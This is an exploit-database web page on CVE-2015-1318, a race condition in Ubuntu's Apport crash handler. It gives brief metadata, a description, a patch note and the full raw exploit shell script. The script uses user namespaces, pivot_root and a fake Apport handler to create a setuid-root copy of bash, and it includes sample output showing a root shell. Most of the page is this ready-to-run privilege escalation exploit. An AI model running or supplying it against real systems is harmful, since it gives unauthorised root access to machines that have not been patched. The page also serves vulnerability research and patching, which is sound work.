header-logo
Suggest Exploit
vendor:
Ubuntu Linux
by:
Ricardo
7.2
CVSS
HIGH
Privilege Escalation
269
CWE
Product Name: Ubuntu Linux
Affected Version From: 2.14.1-0ubuntu3.8
Affected Version To: 2.14.1-0ubuntu3.8
Patch Exists: YES
Related CWE: CVE-2015-1318
CPE: o:ubuntu:ubuntu_linux:14.04.2
Metasploit: N/A
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=82792https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/linux/local/apport_abrt_chroot_priv_eschttps://www.infosecmatter.com/nessus-plugin-library/?id=88587https://www.infosecmatter.com/nessus-plugin-library/?id=86909https://www.infosecmatter.com/nessus-plugin-library/?id=89181https://www.infosecmatter.com/nessus-plugin-library/?id=83238https://www.infosecmatter.com/nessus-plugin-library/?id=83422https://www.infosecmatter.com/nessus-plugin-library/?id=88629https://www.infosecmatter.com/nessus-plugin-library/?id=81944https://www.infosecmatter.com/nessus-plugin-library/?id=93169
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2015

CVE-2015-1318

This exploit is a privilege escalation vulnerability in Apport, a crash reporting system used in Ubuntu. It allows a local user to gain root privileges by exploiting a race condition in the Apport crash handler. The vulnerability is caused by a race condition between the setuid() and execve() system calls. The exploit creates a malicious Apport crash handler script, which is then executed by the Apport crash handler. The malicious script then creates a setuid root shell, which is then executed by the Apport crash handler.

Mitigation:

The vulnerability can be mitigated by applying the patch provided by Ubuntu. The patch ensures that the setuid() system call is executed before the execve() system call.
Source

Exploit-DB raw data:

#!/bin/sh
#
# CVE-2015-1318
# 
# Reference: https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1438758
# 
# Example:
#
# % uname -a
# Linux maggie 3.13.0-48-generic #80-Ubuntu SMP Thu Mar 12 11:16:15 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
#
# % lsb_release -a
# No LSB modules are available.
# Distributor ID: Ubuntu
# Description:    Ubuntu 14.04.2 LTS
# Release:    14.04
# Codename:   trusty
#
# % dpkg -l | grep '^ii  apport ' | awk -F ' '  '{ print $2 " " $3 }'
# apport 2.14.1-0ubuntu3.8
#
# % id
# uid=1000(ricardo) gid=1000(ricardo) groups=1000(ricardo) (...)
#
# % ./apport.sh
# pwned-4.3# id
# uid=1000(ricardo) gid=1000(ricardo) euid=0(root) groups=0(root) (...)
# pwned-4.3# exit

TEMPDIR=$(mktemp -d)

cd ${TEMPDIR}

cp /bin/busybox .

mkdir -p dev mnt usr/share/apport

(
cat << EOF
#!/busybox sh
(
cp /mnt/1/root/bin/bash /mnt/1/root/tmp/pwned
chmod 5755 /mnt/1/root/tmp/pwned
) 
EOF

) > usr/share/apport/apport

chmod +x usr/share/apport/apport

(
cat << EOF
mount -o bind . .
cd .
mount --rbind /proc mnt
touch dev/null
pivot_root . .
./busybox sleep 500 &
SLEEP=\$!
./busybox sleep 1
./busybox kill -11 \$SLEEP
./busybox sleep 5
EOF
) | lxc-usernsexec -m u:0:$(id -u):1 -m g:0:$(id -g):1 2>&1 >/dev/null -- \
    lxc-unshare -s "MOUNT|PID|NETWORK|UTSNAME|IPC" -- /bin/sh 2>&1 >/dev/null

/tmp/pwned -p

rm -Rf ${TEMPDIR}

Navigation

Suggest Exploit

Services By CQR